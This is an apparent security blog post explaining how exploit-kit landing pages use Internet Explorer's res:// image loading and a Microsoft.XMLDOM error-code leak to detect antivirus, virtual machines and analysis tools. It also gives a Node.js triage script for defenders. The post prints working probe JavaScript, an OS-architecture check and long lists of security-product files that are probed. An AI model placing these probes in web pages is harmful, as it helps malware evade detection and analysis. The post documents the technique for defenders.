Software enumeration using Internet Explorer

Software enumeration through Internet Explorer shows up regularly in web infections. Before firing the exploit, the landing page probes for specific files at fixed locations that belong to AV products, virtual machines and analysis tools; if one of them is present, the exploit is not run.

There are two different techniques used:
    1. Image()
    2. Microsoft.XMLDOM – ActiveXObject()

Both techniques look for a file that a given product installs at a fixed, predictable location, so they only catch products installed at their default paths. As of this writing, neither technique works in an up-to-date IE; the XMLDOM error-code leak was assigned CVE-2013-7331 and fixed in MS14-052.

This is the JavaScript you will typically see in a web injection to fingerprint installed software and the OS architecture.

1. Image()
    // Probe a res:// URL by loading it as an image. The res: protocol reads a
    // resource out of a local PE file, so onload fires only if the file exists
    // and contains that resource; a missing file produces no load event.
    function Check(s) {
        x = new Image();
        x.onload = targetfunction;   // handler, not a call: runs only when the resource loads
        x.src = s;
        return 0;
    }
    // res://<module>/#<type>/#<id>: resource type 2 (RT_BITMAP), ID 102, inside
    // shellex.dll of Kaspersky Anti-Virus 5.0 for Windows Workstations
    Check("res://C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 5.0 for Windows Workstations\\shellex.dll/#2/#102")

2. Microsoft.XMLDOM – ActiveXObject()
    // Probe a path by making MSXML fetch it as the external DTD of a DOCTYPE via
    // res://. loadXML() is synchronous regardless of the async flag, so the
    // parse error is available immediately afterwards. The error code differs
    // depending on whether the file exists: an existing file has no DTD resource
    // and yields -2147023083 (0x80070715, ERROR_RESOURCE_TYPE_NOT_FOUND), a
    // missing file yields a different code. That difference is the leak.
    function checksys(txt) {
        var gytyyr = new ActiveXObject("Microsoft.XMLDOM");
        gytyyr.async = true;
        gytyyr.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + txt + '">');
        if (gytyyr.parseError.errorCode != 0) {
            var err = "Error Code: " + gytyyr.parseError.errorCode + "\n";
            err += "Error Reason: " + gytyyr.parseError.reason;
            err += "Error Line: " + gytyyr.parseError.line;
            if (err.indexOf("-2147023083") > 0) {
                return 1;   // file present
            } else {
                return 0;   // file absent (or other error)
            }
        }
        return 0;
    }
    // Kaspersky kernel driver
    checksys("c:\\Windows\\System32\\drivers\\kl1.sys")

The second technique is also used to tell 32-bit from 64-bit Windows: the 32-bit iexplore.exe only lives under "Program Files (x86)" on a 64-bit OS, so if that file exists the system is 64-bit.
    function arch() {
        try {
            var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
            xmlDoc.async = false;
            xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
            // ERROR_RESOURCE_TYPE_NOT_FOUND: the file exists but holds no DTD resource
            if (xmlDoc.parseError.errorCode == -2147023083)  {
                return 64;
            }
        }
        catch (ex) {
            return 0;   // ActiveX blocked or unavailable: undetermined
        }
        return 32;
    }
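As an added example (not code from the original post, and not taken from any exploit kit), here is a Node.js triage script for the defender's side of this: given the JavaScript of a captured landing page, it pulls out every res:// target probed by either technique, splits each into module path, resource type and resource ID, and decodes the magic error code the checks compare against back into its Win32 meaning. The sample landing page it runs on is constructed from the snippets above; the RT_* and ERROR_* names are the Windows SDK constants. Everything else (function names, output shape) is this example's own choice.

```javascript
'use strict';

// Resource type numbers from winuser.h (RT_*). A res:// URL of the form
// res://<module>/#<type>/#<id> addresses resource <id> of this type.
const RT_NAMES = { 2: 'RT_BITMAP', 3: 'RT_ICON', 10: 'RT_RCDATA', 14: 'RT_GROUP_ICON', 16: 'RT_VERSION' };

// Win32 error numbers (winerror.h) that matter when reading parseError.errorCode.
const WIN32_NAMES = {
  2: 'ERROR_FILE_NOT_FOUND',
  3: 'ERROR_PATH_NOT_FOUND',
  1813: 'ERROR_RESOURCE_TYPE_NOT_FOUND',   // module exists but has no DTD resource: the "found it" signal
  1814: 'ERROR_RESOURCE_NAME_NOT_FOUND',
};

// parseError.errorCode is a signed 32-bit HRESULT. Facility 7 (FACILITY_WIN32)
// means the low 16 bits are a plain Win32 error code.
function decodeErrorCode(code) {
  const hresult = code >>> 0;                       // -2147023083 -> 0x80070715
  const facility = (hresult >>> 16) & 0x1fff;
  const win32 = facility === 7 ? hresult & 0xffff : null;
  return {
    hresult: '0x' + hresult.toString(16).padStart(8, '0'),
    win32,
    name: win32 === null ? null : (WIN32_NAMES[win32] || 'unknown'),
  };
}

// Split res://<module>[/#<type>/<id-or-name>] into its parts.
function parseResUrl(url) {
  const m = /^res:\/\/(.+?)(?:\/#(\d+)\/(.+))?$/i.exec(url);
  if (m === null) return null;
  const [, modulePath, type, name] = m;
  if (type === undefined) return { url, modulePath, kind: 'file' };
  return {
    url, modulePath, kind: 'resource',
    resourceType: RT_NAMES[Number(type)] || ('RT_#' + type),
    resourceName: name,                             // "#102" is numeric ID 102; "BBALL" is a named resource
  };
}

// Pull every string literal that is a res:// URL or a bare drive path out of
// JavaScript source. Bare paths are what checksys() receives before it prepends res://.
function extractProbes(source) {
  const literal = /(["'])((?:\\.|(?!\1)[^\\\r\n])*)\1/g;
  const seen = new Set();
  const probes = [];
  let m;
  while ((m = literal.exec(source)) !== null) {
    const value = m[2].replace(/\\\\/g, '\\');     // undo JS escaping: \\ -> \
    let url = null;
    if (/^res:\/\//i.test(value)) url = value;
    else if (/^[a-z]:\\/i.test(value)) url = 'res://' + value;
    if (url === null || seen.has(url.toLowerCase())) continue;
    seen.add(url.toLowerCase());
    const probe = parseResUrl(url);
    if (probe !== null) probes.push(probe);
  }
  return probes;
}

// One-shot verdict for a captured page: which technique(s) it uses and what it probes.
function triage(source) {
  return {
    usesImageProbe: /new\s+Image\s*\(/.test(source),
    usesXmlDomProbe: /Microsoft\.XMLDOM/i.test(source),
    testsResourceTypeNotFound: /2147023083/.test(source),
    probes: extractProbes(source),
  };
}

// Constructed sample: a condensed landing page assembled from the snippets in the post.
const SAMPLE_LANDING_PAGE = String.raw`
function Check(s){x=new Image();x.onload=go;x.src=s;return 0;}
Check("res://C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102");
function checksys(t){var d=new ActiveXObject("Microsoft.XMLDOM");d.async=true;
d.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://'+t+'">');
return (d.parseError.errorCode==-2147023083)?1:0;}
checksys("c:\\Windows\\System32\\drivers\\kl1.sys");
checksys("c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe");
`;

console.log(JSON.stringify(triage(SAMPLE_LANDING_PAGE), null, 2));
console.log(decodeErrorCode(-2147023083)); // { hresult: '0x80070715', win32: 1813, name: 'ERROR_RESOURCE_TYPE_NOT_FOUND' }
```

The extracted module paths are exactly what you would feed into a blocklist or hunt query, and decoding the HRESULT makes the logic of checksys() and arch() obvious: the kit is not asking "did the load succeed" but "did the file exist long enough for the resource lookup to fail", which is why a file-not-found code is treated as "product absent".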

List of SYS/driver file paths searched for:
    c:\WINDOWS\system32\drivers\afwcore.sys
    c:\WINDOWS\system32\drivers\avgtpx86.sys
    c:\WINDOWS\system32\drivers\avipbb.sys
    c:\WINDOWS\system32\drivers\BkavAuto.sys
    c:\WINDOWS\system32\drivers\catflt.sys
    c:\WINDOWS\system32\drivers\cmderd.sys
    c:\Windows\System32\drivers\eamon.sys
    c:\WINDOWS\system32\drivers\econceal.sys
    c:\WINDOWS\system32\drivers\EstRtw.sys
    c:\WINDOWS\system32\drivers\FortiRdr.sys
    c:\WINDOWS\system32\drivers\FStopW.sys
    c:\WINDOWS\system32\drivers\HookHelp.sys
    c:\WINDOWS\system32\drivers\ImmunetProtect.sys
    c:\Windows\System32\drivers\kl1.sys
    c:\Windows\System32\drivers\klflt.sys
    c:\WINDOWS\system32\drivers\klif.sys
    c:\WINDOWS\system32\drivers\kneps.sys
    c:\WINDOWS\system32\drivers\MpFilter.sys
    c:\WINDOWS\system32\drivers\nvcw32mf.sys
    c:\Windows\System32\drivers\Parity.sys
    c:\Windows\System32\drivers\prl_boot.sys
    c:\Windows\System32\drivers\prl_fs.sys
    c:\Windows\System32\drivers\prl_kmdd.sys
    c:\Windows\System32\drivers\prl_memdev.sys
    c:\Windows\System32\drivers\prl_mouf.sys
    c:\Windows\System32\drivers\prl_pv32.sys
    c:\Windows\System32\drivers\prl_sound.sys
    c:\Windows\System32\drivers\prl_strg.sys
    c:\Windows\System32\drivers\prl_tg.sys
    c:\Windows\System32\drivers\prl_time.sys
    c:\Windows\system32\drivers\protreg.sys
    c:\Windows\system32\drivers\SophosBootDriver.sys
    c:\Windows\system32\drivers\SYMEVENT.SYS
    c:\Windows\system32\drivers\SysGuard.sys
    c:\windows\system32\drivers\tmactmon.sys
    c:\windows\system32\drivers\tmcomm.sys
    c:\windows\system32\drivers\TMEBC32.sys
    c:\windows\system32\drivers\tmeext.sys
    c:\windows\system32\drivers\tmevtmgr.sys
    c:\windows\system32\drivers\tmnciesc.sys
    c:\windows\system32\drivers\tmtdi.sys
    c:\Windows\system32\drivers\vbengnt.sys
    c:\Windows\System32\drivers\VBoxGuest.sys
    c:\Windows\System32\drivers\VBoxMouse.sys
    c:\Windows\System32\drivers\VBoxSF.sys
    c:\Windows\System32\drivers\VBoxVideo.sys
    c:\Windows\System32\drivers\vm3dmp.sys
    c:\Windows\System32\drivers\vmhgfs.sys
    c:\Windows\System32\drivers\vmmouse.sys
    c:\Windows\System32\drivers\vmnet.sys
    c:\Windows\System32\drivers\vmusbmouse.sys
    c:\Windows\system32\drivers\vmx86.sys
    c:\Windows\System32\drivers\vmxnet.sys
    c:\Windows\system32\drivers\WpsHelper.sys

List of EXE/DLL paths searched for:
    c:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
    c:\Program Files (x86)\7-Zip\7z.exe
    C:\Program Files (x86)\EMET 4.1\EMET.dll
    C:\Program Files (x86)\EMET 5.0\EMET.dll
    c:\Program Files (x86)\iTunes\iTunesHelper.exe
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
    c:\Program Files (x86)\Microsoft SQL Server\80\COM\sqlvdi.dll
    c:\Program Files (x86)\Microsoft SQL Server\90\COM\instapi.dll
    c:\Program Files\7-Zip\7z.exe
    C:\Program Files\a-squared Anti-Malware\a2cmd.exe
    C:\Program Files\agb7pro\agb.exe
    C:\Program Files\Agnitum\Outpost Security Suite Pro\acs.exe
    C:\Program Files\AhnLab\V3IS80\V3Main.exe
    c:\Program Files\AVG Secure Search\13.2.0.4\AVG Secure Search_toolbar.dll
    c:\Program Files\Bitdefender\Bitdefender 2013 BETA\Active Virus Control\avc3_000_001\avcuf32.dll
    c:\Program Files\Bitdefender\Bitdefender 2013 BETA\BdProvider.dll
    C:\Program Files\BkavHome\Bka.exe
    c:\Program Files\Common Files\AVG Secure Search\DNTInstaller\13.2.0\avgdttbx.dll
    c:\Program Files\Common Files\McAfee\SystemCore\mytilus3.dll
    c:\Program Files\Common Files\McAfee\SystemCore\mytilus3_worker.dll
    c:\Program Files\DrWeb\drwebsp.dll
    C:\Program Files\EMET 4.1\EMET.dll
    C:\Program Files\EMET 5.0\EMET.dll
    C:\Program Files\eScan\shortcut.exe
    C:\Program Files\ESET\ESET Smart Security\egui.exe
    C:\Program Files\ESTsoft\ALYac\AYLaunch.exe
    C:\Program Files\F-Secure\ExploitShield\fsesgui.exe
    c:\Program Files\F-Secure\FSPS\program\FSLSP.DLL
    c:\program files\f-secure\hips\fshook32.dll
    c:\program files\f-secure\scanner-interface\fsgkiapi.dll
    C:\Program Files\Fiddler2\Fiddler.exe
    C:\Program Files\Fortinet\FortiClient\FortiClient.exe
    C:\Program Files\FRISK Software\F-PROT Antivirus for Windows\FPWin.exe
    C:\Program Files\IKARUS\anti.virus\unGuardX.exe
    C:\Program Files\Immunet\ips.exe
    C:\Program Files\INCAInternet\nProtect Anti-Virus Spyware 3.0\nsphsvr.exe
    c:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\JiangMin\AntiVirus\KVPopup.exe
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
    c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\klwtblc.dll
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
    c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\klwtblc.dll
    c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\remote_eka_prague_loader.dll
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 5.0 for Windows Workstations\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Endpoint Security 8 for Windows\avp.exe
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
    c:\Program Files\McAfee\VirusScan Enterprise\RES0402\McShield.dll
    c:\Program Files\Microsoft SQL Server\80\COM\sqlvdi.dll
    c:\Program Files\Microsoft SQL Server\90\COM\instapi.dll
    C:\Program Files\Norman\Nse\Bin\nse.exe
    C:\Program Files\Norton Internet Security\Branding\muis.dll
    C:\Program Files\Norton Internet Security\Engine\21.1.0.18\asOEHook.dll/#2/#102
    C:\Program Files\Norton Internet Security\Engine\21.6.0.32\asOEHook.dll/#2/#102
    C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
    C:\Program Files\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
    C:\Program Files\PC Tools Antivirus Software\pctsGui.exe
    C:\Program Files\Quick Heal\Quick Heal Total Security\ARKIT.EXE
    C:\Program Files\Rising\RFW\RavMonD.exe
    C:\Program Files\Rising\RIS\LangSel.exe
    C:\Program Files\Sophos\Sophos Anti-Virus\SavMain.exe
    C:\Program Files\Sunbelt Software\Personal Firewall\cfgconv.exe
    C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
    C:\Program Files\Symantec\Symantec Endpoint Protection\DoScan.exe
    c:\Program Files\Symantec\Symantec Endpoint Protection\wpsman.dll
    C:\Program Files\Trend Micro\Titanium\UIFramework\uiWinMgr.exe
    C:\Program Files\ViRobotXP\Vrmonnt.exe
    C:\Program Files\VirusBuster\winpers.exe
    C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
    C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
    c:\Program Files\WinRAR\WinRAR.exe
    c:\Program Files\WinZip\WZSHLSTB.DLL
    c:\Program Files\WinZip\ZipSendB.dll
    D:\Program Files (x86)\EMET 4.1\EMET.dll
    d:\Program Files (x86)\EMET 5.0\EMET.dll
    d:\Program Files\EMET 4.1\EMET.dll
    d:\Program Files\EMET 5.0\EMET.dll

List of ActiveX controls instantiated (a successful new ActiveXObject() on the ProgID reveals the product):
    Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.1
    Symantec.IPS.WebProtection.1

This entry was posted in Exploit, Exploit Kit, IE.

2 Responses to Software enumeration using Internet Explorer

  1. Alex says:

    Could you explain in what version of IE the first technique works?
